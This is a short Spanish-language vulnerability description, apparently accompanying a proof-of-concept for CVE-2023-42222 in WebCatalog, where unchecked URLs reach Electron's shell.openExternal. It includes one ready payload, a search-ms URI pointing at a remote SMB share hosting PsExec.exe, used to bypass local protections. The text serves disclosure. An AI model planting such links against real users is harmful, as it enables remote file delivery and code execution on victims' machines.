
Exploit de prueba de concepto para CVE-2023-42222 en WebCatalog, que demuestra la ejecución arbitraria de URL a través de shell.openExternal de Electron para eludir las protecciones de seguridad y ejecutar código.
WebCatalog anterior a la versión 48.4.0 llama a la función Electron shell.openExternal sin verificar que la URL corresponda a un recurso http o https, en algunas circunstancias. Esta vulnerabilidad permite a un atacante ejecutar código en la máquina de la víctima enviando mensajes que contienen enlaces con protocolos arbitrarios. La víctima debe interactuar con el enlace y ve la URL que se abre.


La vulnerabilidad se puede confirmar sincronizando una página que permita URLs arbitrarias. Si se sincroniza un sitio web que contiene search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools, se crea una conexión SMB externa. Esto puede usarse para eludir las protecciones de seguridad en la máquina local y presentar archivos maliciosos al usuario, que normalmente estarían bloqueados.